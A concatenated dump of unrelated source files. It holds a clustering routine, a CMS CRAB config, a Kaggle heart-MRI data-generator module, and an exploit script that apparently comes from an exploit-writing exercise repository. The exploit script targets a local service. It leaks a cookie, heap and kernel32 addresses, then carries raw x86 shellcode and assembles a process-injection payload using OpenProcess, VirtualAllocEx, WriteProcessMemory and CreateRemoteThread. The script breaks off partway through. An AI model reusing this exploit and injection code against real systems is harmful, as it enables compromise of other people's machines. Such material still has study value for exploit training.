	Returns (cluster, num_cluster); num_cluster grows by one when no host
	cluster exists and a new one is created.
	"""
	mu = cluster['mu']
	muTheta = cluster['mu_theta']
	sigmaTheta = cluster['sigma_theta']
	pi = cluster['pi_weight']
	# Angle of X to every cluster mean (degrees), one column per cluster.
	theta = angleBetweenVectors(X, mu)
	# Get Host Clusters
	# A cluster "hosts" X when the angle to its mean lies within
	# mu_theta + k*sigma_theta.
	host_cluster = abs(theta) < abs( muTheta + k*sigmaTheta )
	host = host_cluster[0, :]
	# No host cluster => Create new cluster
	if np.all(~host_cluster) == True:
		num_cluster += 1
		return newCluster(cluster, X, theta), num_cluster
	# Get Membership Values
	# Gaussian membership in the angle, normalized over the host clusters.
	membrship_host = getMembership(theta[:, host], sigmaTheta[:, host])
	alpha = membrship_host/(np.sum(membrship_host, keepdims=True))
	# Update Cluster parameters
	# NOTE(review): the mean update adds X unweighted ((1-alpha)*mu + X,
	# not (1-alpha)*mu + alpha*X); the normalize() below restores unit
	# length, but confirm this weighting is intended.
	mu[:, host] = (1-alpha)* mu[:, host] + X
	muTheta[:, host] = (1 - beta)*muTheta[0, host] + beta*theta[:, host]
	sigmaTheta[:, host] = np.sqrt(abs((1-beta)*(sigmaTheta[:, host]**2 + beta*(theta[:, host] - muTheta[:, host])**2)))
	pi[:, host] = (1 - gamma*alpha)*pi[:, host] + gamma*alpha
	# Penalize non-host clusters
	pi[:,~host] -= gamma
	mu = normalize(mu) #normalize mean vector
	cluster['mu'] = mu
	cluster['mu_theta'] = muTheta
	cluster['sigma_theta'] = sigmaTheta
	cluster['pi_weight'] = pi
	return cluster, num_cluster
def mergeCluster(cluster, num_cluster, merge_threshold):
	"""Greedily merge cluster pairs whose mean directions lie too close.

	Clusters j and k merge when the angle phi between their mean vectors,
	scaled by their angular spreads, falls below the threshold:
	    (phi/2) * (1/sigma_j + 1/sigma_k) < merge_threshold
	Returns the updated (cluster, num_cluster).

	Fixes vs. the original:
	  * combineClusters was invoked through an undefined name ``skutil``,
	    raising NameError whenever a merge actually fired;
	  * stale pre-merge arrays were written back into ``cluster`` after the
	    loop, silently discarding any merge results;
	  * the ``range`` bounds never considered the last cluster and were not
	    re-adjusted after a deletion, so indices could run past the
	    shrunken arrays.
	"""
	j = 0
	while j < num_cluster - 1:
		k = j + 1
		while k < num_cluster:
			phi = angleBetweenVectors(cluster['mu'][:, j], cluster['mu'][:, k])
			# Merge when the angular gap is small relative to both spreads.
			if (phi/2)*(1/cluster['sigma_theta'][0, j] + 1/cluster['sigma_theta'][0, k]) < merge_threshold:
				cluster = combineClusters(cluster, j, k)  # removes column k
				num_cluster -= 1
			else:
				k += 1
		j += 1
	cluster['mu'] = normalize(cluster['mu'])
	return cluster, num_cluster
"noreply@github.com"
] | thevishalagarwal.noreply@github.com |
d60ad3880d7c6e574a14889e96134d03ea0cf5a7 | 54fdaa05078261180cbd7cc94c132527725b189d | /test/crab_ElectronPlots_newskim_eraBv2.py | 3669634ae8acc57d136ad537adca62dd18a27724 | [] | no_license | psiddire/ZeeAnalyzer | e488d3b65108ca923bd459cda41e61f3bd746a5b | d94b1fd4f4de19f5cdeaf405e4c0d6629b889888 | refs/heads/master | 2021-09-07T12:20:36.554253 | 2018-02-22T18:31:52 | 2018-02-22T18:31:52 | 113,574,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | # from https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookCRAB3Tutorial
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
# --- General: task bookkeeping and what CRAB copies back ---
config.General.requestName = 'plots_Zee_newskim_eraBv2'
config.General.workArea = 'crab_projects'
config.General.transferOutputs = True
config.General.transferLogs = True
# --- JobType: run the CMSSW analysis config below on each job ---
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'runElectronPlots_newSkim_v2.py'
# --- Data: input dataset, splitting, and the certified-lumi selection ---
config.Data.inputDataset = '/DoubleEG/Run2017B-PromptReco-v2/MINIAOD'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
config.Data.unitsPerJob = 1000
config.Data.lumiMask = 'NewJson.txt'
config.Data.runRange = '297050-299329'
#config.Data.totalUnits = 1
config.Data.outLFNDirBase = '/store/user/%s/' % (getUsernameFromSiteDB())
config.Data.publication = True
config.Data.outputDatasetTag = 'Zee_ElectronPlots_newskim_eraBv2'
# --- Site: where the output is staged out ---
config.Site.storageSite = 'T2_CH_CERN'
#all the configuration parameters https://twiki.cern.ch/twiki/bin/view/CMSPublic/CRAB3ConfigurationFile
#all crab commands https://twiki.cern.ch/twiki/bin/view/CMSPublic/CRAB3Commands
| [
"psiddire@nd.edu"
] | psiddire@nd.edu |
1b90511986a531459e5946949c883716a0400749 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories/267667/kaggle-heart-master/ira/data_iterators.py | cf51b09e680a9c57f815dfc6f35d04a33d7f6edb | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,976 | py | import data
import glob
import re
import itertools
from collections import defaultdict
import numpy as np
import utils
class SliceNormRescaleDataGenerator(object):
    """Batch generator over individual slices of one view (default 'sax').

    generate() yields ([x_batch], [y0_batch, y1_batch], patients_ids) where
    x_batch holds the 30 frames of each slice after data_prep_fun has
    normalized/rescaled them to transform_params['patch_size'].
    """
    def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
                 slice2roi_path=None, full_batch=False, random=True, infinite=False, view='sax',
                 data_prep_fun=data.transform_norm_rescale, **kwargs):
        # Restrict to the requested patients, else take every patient
        # directory found under data_path.
        if patient_ids:
            self.patient_paths = []
            for pid in patient_ids:
                self.patient_paths.append(data_path + '/%s/study/' % pid)
        else:
            self.patient_paths = glob.glob(data_path + '/*/study/')
        # Flatten all per-patient slice pickles of the requested view.
        self.slice_paths = [sorted(glob.glob(p + '/%s_*.pkl' % view)) for p in self.patient_paths]
        self.slice_paths = list(itertools.chain(*self.slice_paths))
        self.slicepath2pid = {}
        for s in self.slice_paths:
            self.slicepath2pid[s] = int(utils.get_patient_id(s))
        self.nsamples = len(self.slice_paths)
        self.batch_size = batch_size
        self.rng = np.random.RandomState(42)  # fixed seed: reproducible shuffling
        self.full_batch = full_batch
        self.random = random
        self.infinite = infinite
        self.id2labels = data.read_labels(labels_path) if labels_path else None
        self.transformation_params = transform_params
        self.data_prep_fun = data_prep_fun
        self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
    def generate(self):
        """Yield slice batches; loops forever when self.infinite, else one epoch."""
        while True:
            rand_idxs = np.arange(self.nsamples)
            if self.random:
                self.rng.shuffle(rand_idxs)
            for pos in xrange(0, len(rand_idxs), self.batch_size):
                idxs_batch = rand_idxs[pos:pos + self.batch_size]
                nb = len(idxs_batch)
                # allocate batch
                x_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'], dtype='float32')
                y0_batch = np.zeros((nb, 1), dtype='float32')
                y1_batch = np.zeros((nb, 1), dtype='float32')
                patients_ids = []
                for i, j in enumerate(idxs_batch):
                    slicepath = self.slice_paths[j]
                    patient_id = self.slicepath2pid[slicepath]
                    patients_ids.append(patient_id)
                    # Optional region-of-interest looked up per patient/slice.
                    slice_roi = self.slice2roi[str(patient_id)][
                        utils.get_slice_id(slicepath)] if self.slice2roi else None
                    slice_data = data.read_slice(slicepath)
                    metadata = data.read_metadata(slicepath)
                    # targets_zoom rescales the labels consistently with the image zoom.
                    x_batch[i], targets_zoom = self.data_prep_fun(slice_data, metadata, self.transformation_params,
                                                                  roi=slice_roi)
                    if self.id2labels:
                        y0_batch[i] = self.id2labels[patient_id][0] * targets_zoom
                        y1_batch[i] = self.id2labels[patient_id][1] * targets_zoom
                # full_batch drops a trailing partial batch instead of yielding it.
                if self.full_batch:
                    if nb == self.batch_size:
                        yield [x_batch], [y0_batch, y1_batch], patients_ids
                else:
                    yield [x_batch], [y0_batch, y1_batch], patients_ids
            if not self.infinite:
                break
class PatientsDataGenerator(object):
    """Batch generator yielding all SAX slices of each patient together.

    generate() yields ([x, slice_mask, slice_location, sex_age],
    [y0, y1], patients_ids).  Slices are ordered by their estimated
    physical location and zero-padded (mask = 0) up to the dataset-wide
    maximum slice count self.nslices.
    """
    def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
                 slice2roi_path=None, full_batch=False, random=True, infinite=True, min_slices=0,
                 data_prep_fun=data.transform_norm_rescale,
                 **kwargs):
        if patient_ids:
            patient_paths = []
            for pid in patient_ids:
                patient_paths.append(data_path + '/%s/study/' % pid)
        else:
            patient_paths = glob.glob(data_path + '/*/study/')
        self.pid2slice_paths = defaultdict(list)
        nslices = []
        for p in patient_paths:
            pid = int(utils.get_patient_id(p))
            # sax_<n>.pkl files sorted numerically by <n>
            spaths = sorted(glob.glob(p + '/sax_*.pkl'), key=lambda x: int(re.search(r'/sax_(\d+)\.pkl$', x).group(1)))
            # consider patients only with min_slices
            if len(spaths) > min_slices:
                self.pid2slice_paths[pid] = spaths
                nslices.append(len(spaths))
        # take max number of slices
        self.nslices = int(np.max(nslices))
        self.patient_ids = self.pid2slice_paths.keys()
        self.nsamples = len(self.patient_ids)
        self.data_path = data_path
        self.id2labels = data.read_labels(labels_path) if labels_path else None
        self.batch_size = batch_size
        self.rng = np.random.RandomState(42)  # fixed seed: reproducible shuffling
        self.full_batch = full_batch
        self.random = random
        self.batch_size = batch_size  # NOTE(review): duplicate assignment; harmless
        self.infinite = infinite
        self.transformation_params = transform_params
        self.data_prep_fun = data_prep_fun
        self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
    def generate(self):
        """Yield padded per-patient batches; one epoch unless self.infinite."""
        while True:
            rand_idxs = np.arange(self.nsamples)
            if self.random:
                self.rng.shuffle(rand_idxs)
            for pos in xrange(0, len(rand_idxs), self.batch_size):
                idxs_batch = rand_idxs[pos:pos + self.batch_size]
                nb = len(idxs_batch)
                # allocate batches
                x_batch = np.zeros((nb, self.nslices, 30) + self.transformation_params['patch_size'],
                                   dtype='float32')
                sex_age_batch = np.zeros((nb, 2), dtype='float32')
                slice_location_batch = np.zeros((nb, self.nslices, 1), dtype='float32')
                slice_mask_batch = np.zeros((nb, self.nslices), dtype='float32')
                y0_batch = np.zeros((nb, 1), dtype='float32')
                y1_batch = np.zeros((nb, 1), dtype='float32')
                patients_ids = []
                for i, idx in enumerate(idxs_batch):
                    pid = self.patient_ids[idx]
                    patients_ids.append(pid)
                    slice_paths = self.pid2slice_paths[pid]
                    # fill metadata dict for linefinder code and sort slices
                    slicepath2metadata = {}
                    for sp in slice_paths:
                        slicepath2metadata[sp] = data.read_metadata(sp)
                    slicepath2location = data.slice_location_finder(slicepath2metadata)
                    slice_paths = sorted(slicepath2location.keys(), key=slicepath2location.get)
                    # sample augmentation params per patient
                    random_params = data.sample_augmentation_parameters(self.transformation_params)
                    for j, sp in enumerate(slice_paths):
                        slice_roi = self.slice2roi[str(pid)][
                            utils.get_slice_id(sp)] if self.slice2roi else None
                        slice_data = data.read_slice(sp)
                        x_batch[i, j], targets_zoom = self.data_prep_fun(slice_data, slicepath2metadata[sp],
                                                                         self.transformation_params,
                                                                         roi=slice_roi,
                                                                         random_augmentation_params=random_params)
                        slice_location_batch[i, j] = slicepath2location[sp]
                        slice_mask_batch[i, j] = 1.
                    sex_age_batch[i, 0] = slicepath2metadata[slice_paths[0]]['PatientSex']
                    sex_age_batch[i, 1] = slicepath2metadata[slice_paths[0]]['PatientAge']
                    if self.id2labels:
                        y0_batch[i] = self.id2labels[pid][0] * targets_zoom
                        y1_batch[i] = self.id2labels[pid][1] * targets_zoom
                # full_batch drops a trailing partial batch instead of yielding it.
                if self.full_batch:
                    if nb == self.batch_size:
                        yield [x_batch, slice_mask_batch, slice_location_batch, sex_age_batch], [y0_batch,
                                                                                                y1_batch], patients_ids
                else:
                    yield [x_batch, slice_mask_batch, slice_location_batch, sex_age_batch], [y0_batch,
                                                                                            y1_batch], patients_ids
            if not self.infinite:
                break
class Ch2Ch4DataGenerator(object):
    """Batch generator over the 2-chamber and 4-chamber views per patient.

    generate() yields ([x_ch2, x_ch4], [y0, y1], patients_ids).  When one of
    the two views is missing it is substituted by the other; SAX metadata and
    ROIs are passed along to data.transform_ch.
    """
    def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
                 slice2roi_path=None, full_batch=False, random=True, infinite=True, min_slices=5, **kwargs):
        if patient_ids:
            patient_paths = []
            for pid in patient_ids:
                patient_paths.append(data_path + '/%s/study/' % pid)
        else:
            patient_paths = glob.glob(data_path + '/*/study/')
        self.pid2sax_slice_paths = defaultdict(list)
        self.pid2ch2_path, self.pid2ch4_path = {}, {}
        for p in patient_paths:
            pid = int(utils.get_patient_id(p))
            # sax_<n>.pkl files sorted numerically by <n>
            spaths = sorted(glob.glob(p + '/sax_*.pkl'), key=lambda x: int(re.search(r'/sax_(\d+)\.pkl$', x).group(1)))
            # Only keep patients with more than min_slices SAX slices.
            if len(spaths) > min_slices:
                self.pid2sax_slice_paths[pid] = spaths
                ch2_path = glob.glob(p + '/2ch_*.pkl')
                self.pid2ch2_path[pid] = ch2_path[0] if ch2_path else None
                ch4_path = glob.glob(p + '/4ch_*.pkl')
                self.pid2ch4_path[pid] = ch4_path[0] if ch4_path else None
        self.patient_ids = self.pid2sax_slice_paths.keys()
        self.nsamples = len(self.patient_ids)
        self.id2labels = data.read_labels(labels_path) if labels_path else None
        self.batch_size = batch_size
        self.rng = np.random.RandomState(42)  # fixed seed: reproducible shuffling
        self.full_batch = full_batch
        self.random = random
        self.batch_size = batch_size  # NOTE(review): duplicate assignment; harmless
        self.infinite = infinite
        self.transformation_params = transform_params
        self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
    def generate(self):
        """Yield ch2/ch4 batches; one epoch unless self.infinite."""
        while True:
            rand_idxs = np.arange(self.nsamples)
            if self.random:
                self.rng.shuffle(rand_idxs)
            for pos in xrange(0, len(rand_idxs), self.batch_size):
                idxs_batch = rand_idxs[pos:pos + self.batch_size]
                nb = len(idxs_batch)
                # allocate batches
                x_ch2_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'],
                                       dtype='float32')
                x_ch4_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'],
                                       dtype='float32')
                y0_batch = np.zeros((nb, 1), dtype='float32')
                y1_batch = np.zeros((nb, 1), dtype='float32')
                patients_ids = []
                for i, idx in enumerate(idxs_batch):
                    pid = self.patient_ids[idx]
                    patients_ids.append(pid)
                    # do everything with sax
                    sax_slice_paths = self.pid2sax_slice_paths[pid]
                    sax_slicepath2metadata = {}
                    sax_slicepath2roi = {}
                    for s in sax_slice_paths:
                        sax_metadata = data.read_metadata(s)
                        sax_slicepath2metadata[s] = sax_metadata
                        sid = utils.get_slice_id(s)
                        roi = self.slice2roi[str(pid)][sid]
                        sax_slicepath2roi[s] = roi
                    # read ch2, ch4
                    if self.pid2ch2_path[pid]:
                        data_ch2 = data.read_slice(self.pid2ch2_path[pid])
                        metadata_ch2 = data.read_metadata(self.pid2ch2_path[pid])
                    else:
                        data_ch2, metadata_ch2 = None, None
                    if self.pid2ch4_path[pid]:
                        data_ch4 = data.read_slice(self.pid2ch4_path[pid])
                        metadata_ch4 = data.read_metadata(self.pid2ch4_path[pid])
                    else:
                        data_ch4, metadata_ch4 = None, None
                    # Fall back to the other view when one is missing.
                    if data_ch2 is None and data_ch4 is not None:
                        data_ch2 = data_ch4
                    if data_ch4 is None and data_ch2 is not None:
                        data_ch4 = data_ch2
                    # sample augmentation params per patient
                    random_params = data.sample_augmentation_parameters(self.transformation_params)
                    x_ch2_batch[i], x_ch4_batch[i], targets_zoom = data.transform_ch(data_ch2, metadata_ch2,
                                                                                     data_ch4, metadata_ch4,
                                                                                     saxslice2metadata=sax_slicepath2metadata,
                                                                                     transformation=self.transformation_params,
                                                                                     sax2roi=sax_slicepath2roi,
                                                                                     random_augmentation_params=random_params)
                    if self.id2labels:
                        y0_batch[i] = self.id2labels[pid][0] * targets_zoom
                        y1_batch[i] = self.id2labels[pid][1] * targets_zoom
                # full_batch drops a trailing partial batch instead of yielding it.
                if self.full_batch:
                    if nb == self.batch_size:
                        yield [x_ch2_batch, x_ch4_batch], [y0_batch, y1_batch], patients_ids
                else:
                    yield [x_ch2_batch, x_ch4_batch], [y0_batch, y1_batch], patients_ids
            if not self.infinite:
                break
| [
"keesiu.wong@gmail.com"
] | keesiu.wong@gmail.com |
d7b6b9885167a93f16a840f3c754138d408cbf89 | ee2bf52e37e23ea3030da212beb484319a35ed80 | /2015-2016 Nivel Basico/16_ejercicio16/Ejercicio16.py | 4e2874414e60ade932b0e3facb14bf2c7d454533 | [] | no_license | Trietptm-on-Coding-Algorithms/CLS-Exploits | 318fde8c3817fc6cf7e81ddf392f5eeac1f5c898 | 94ea56cf51fcd89330c0d93e62d5f3d905e5e602 | refs/heads/master | 2020-03-20T19:15:58.696676 | 2016-08-28T11:02:32 | 2016-08-28T11:02:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,482 | py | import socket, struct, binascii, array, time
from nutshell import *
# PEP 8 (E731): named defs instead of lambda assignments; same callables.
def p (x):
	"""Pack an int as a 4-byte little-endian unsigned dword."""
	return struct.pack ("<I", x)
def u (x):
	"""Unpack a 4-byte little-endian dword; returns a 1-tuple like struct.unpack."""
	return struct.unpack ("<I", x)
def signedHex (val, nbits):
	"""Two's-complement hex representation of val within nbits bits."""
	return hex ((val + (1 << nbits)) % (1 << nbits))
def littleE2Hex (x):
	"""Decode a 4-byte little-endian string as an unsigned 32-bit integer.

	The original body round-tripped the bytes through a hex string and
	byte-swapped an array it never used: ``unhexlify(x.encode("hex"))``
	is just ``x`` again, so everything except the final unpack was dead
	code.  The direct unpack below is equivalent (and also works on
	Python 3 byte strings).
	"""
	return struct.unpack ("<I", x)[0]
# VirtualAlloc's offset inside two known kernel32.dll builds, keyed by the
# hex of the two low leaked bytes of its address; used below (round 2) to
# recover the kernel32 image base from the leak.
kernel32_offset = {"b62f" : 0x52fb6, "dfa3" : 0xe547}
# Credential string expected by the vulnerable service (NUL-terminated).
user = "pepe choto\x00"
s = socket.create_connection ( ("127.0.0.1", 27015) )
print "[+] sending user credentials"
# The service reads a fixed 0x200-byte credential record; pad with NULs.
s.send (user + "\x00"*(0x200 - len(user)))
# \xf48
# Seven request/response rounds: rounds 0-2 harvest leaks (cookie, heap
# address, kernel32 pointers), round 3 plants the ROP chain + shellcode,
# the remaining rounds send oversized records.
for i in range (7):
	print "[!] counter %d" % i
	if i == 0:
		# First reply carries a 4-byte cookie in front; every later
		# packet must echo it back.
		buf = s.recv (15)
		cookie = buf[:4]
		print "	[*] cookie: 0x%04x " % littleE2Hex(cookie)
	else:
		buf = s.recv(40)
	if i == 1:
		# Reply leaks a heap pointer; the chunk that will hold our egg
		# sits at a fixed offset (+0x907) from it.
		heap = littleE2Hex(buf[:4])
		print "[!] LEAK heap address: 0x%x" % heap
		egg_heap = heap + 0x907
		print "	heap chunk predicted at 0x%x" % egg_heap
	if i == 2:
		# Reply leaks VirtualAlloc and malloc addresses; the kernel32
		# base is recovered via the per-build offset table above.
		virtualAlloc = littleE2Hex (buf[20:24])
		kernelBase = virtualAlloc - kernel32_offset[buf[20:22].encode("hex")]
		malloc = littleE2Hex (buf[24:28])
		print "[!] LEAKS\n	virtualloc:0x%x, malloc:0x%x, kernel32:0x%x" % (virtualAlloc, malloc, kernelBase)
	# Each request is: cookie + two size dwords + NOP filler up to 0x200,
	# followed by payload data of the announced size(s).
	if i == 0:
		s.send(cookie + p(0x1) + p(0x1) + "\x90" *(0x200 - (8 + len(cookie))))
		s.send("A"*2)
	if i == 1:
		s.send(cookie + p(0x30) + p(0x10) + "\x90" *(0x200 - (8 + len(cookie))))
		s.send("A"*(0x40))
	if i == 2:
		s.send(cookie + p(0x30) + p(0x857) + "\x90" *(0x200 - (8 + len(cookie))))
		s.send(cookie + "B"*(0x30 - len(cookie)))
		s.send(cookie + "C"*(0x857 - len(cookie)))
	if i == 3:
		# NUL-padded API name strings; the injected code pushes these on
		# its stack and resolves each one at run time (see the
		# GetProcAddress calls in the assembly below).
		calc = "calc.exe"
		user = "user32.dll"
		user += "\x00"*(12 - len(user))
		FWindow = "FindWindowA"
		FWindow += "\x00"*(12 - len(FWindow))
		GetPid = "GetWindowThreadProcessId"
		GetPid += "\x00"*(28 - len(GetPid))
		Open = "OpenProcess"
		Open += "\x00"*(12 - len(Open))
		VallocEx = "VirtualAllocEx"
		VallocEx += "\x00"*(16 - len(VallocEx))
		Write = "WriteProcessMemory"
		Write += "\x00"*(20 - len(Write))
		Create = "CreateRemoteThread"
		Create += "\x00"*(20 - len(Create))
		ExitProcess = "ExitProcess\x00"
		# nutshell assembler instance for 32-bit x86 shellcode.
		egg = Nutshell("x86", 0)
sc_msgbox = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
sc_msgbox += "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
sc_msgbox += "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
sc_msgbox += "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
sc_msgbox += "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
sc_msgbox += "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
sc_msgbox += "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
sc_msgbox += "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
sc_msgbox += "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
sc_msgbox += "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
sc_msgbox += "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
sc_msgbox += "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
sc_msgbox += "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
sc_msgbox += "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
sc_msgbox += "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
sc_msgbox += "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
sc_msgbox += "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
sc_msgbox += "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
sc_msgbox += "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
sc_msgbox += "\x2C\x57\x68\x43\x4C\x53\x21\x8B\xDC\x57"
sc_msgbox += "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
sc_msgbox += "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
sc_msgbox += "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
sc_msgbox += "\x40\xFF\x54\x24\x40\x57\xFF\xD0"
execalc = "\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
execalc += "\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
execalc += "\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
execalc += "\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
execalc += "\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\x90"
shellcode = execalc
shellcode += egg.nut_revolve("esi", "ebx") # esi = GetProcAddress, ebx = GetModuleHandle
shellcode += egg.nut_asm("push 0x%s" % user[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % user[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % user[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov edi, eax") # edi = module handle user32.dll
shellcode += egg.nut_asm("add esp, 0xC")
shellcode += egg.nut_asm("push 0x%s" % FWindow[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % FWindow[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % FWindow[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 4], eax") #FindWindow
shellcode += egg.nut_asm("push 0x%s" % GetPid[24:28][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[20:24][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 8], eax") #GetWindowThreadProcessId
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 12], eax") #ExitProcess
shellcode += egg.nut_asm("push 0x%s" % VallocEx[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 16], eax") #VirtualAlloEx
shellcode += egg.nut_asm("push 0x%s" % Open[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Open[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Open[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 20], eax") #OpenProcess
shellcode += egg.nut_asm("push 0x%s" % Write[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 24], eax") #WriteProcess
shellcode += egg.nut_asm("push 0x%s" % Create[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 28], eax") #CreateRemoteProcess
calc = "Calculator\x00"
shellcode += egg.nut_asm("push 0x%s" % calc[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % calc[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % calc[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("mov [ebp + 32], esp")
shellcode += egg.nut_asm("mov eax, [ebp + 4]")
shellcode += egg.nut_asm("xor edi, edi")
shellcode += egg.nut_asm("push [ebp + 32]")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call eax") # FindWindow(NULL, "Calculator")
shellcode += egg.nut_asm("mov [ebp + 36], eax")
shellcode += egg.nut_asm("mov eax, [ebp + 8]")
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push [ebp + 36]")
shellcode += egg.nut_asm("call eax") # GetWindowThreadProcessId([ebp + 28], esp)
shellcode += egg.nut_asm("mov eax, [esp]")
shellcode += egg.nut_asm("mov ebx, [ebp + 20]")
shellcode += egg.nut_asm("push eax")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x1f0fff")
shellcode += egg.nut_asm("call ebx") # OpenProcess(process_all, False, pid)
shellcode += egg.nut_asm("mov [ebp + 40], eax") # handle
shellcode += egg.nut_asm("mov ebx, [ebp+16]")
shellcode += egg.nut_asm("push 0x40")
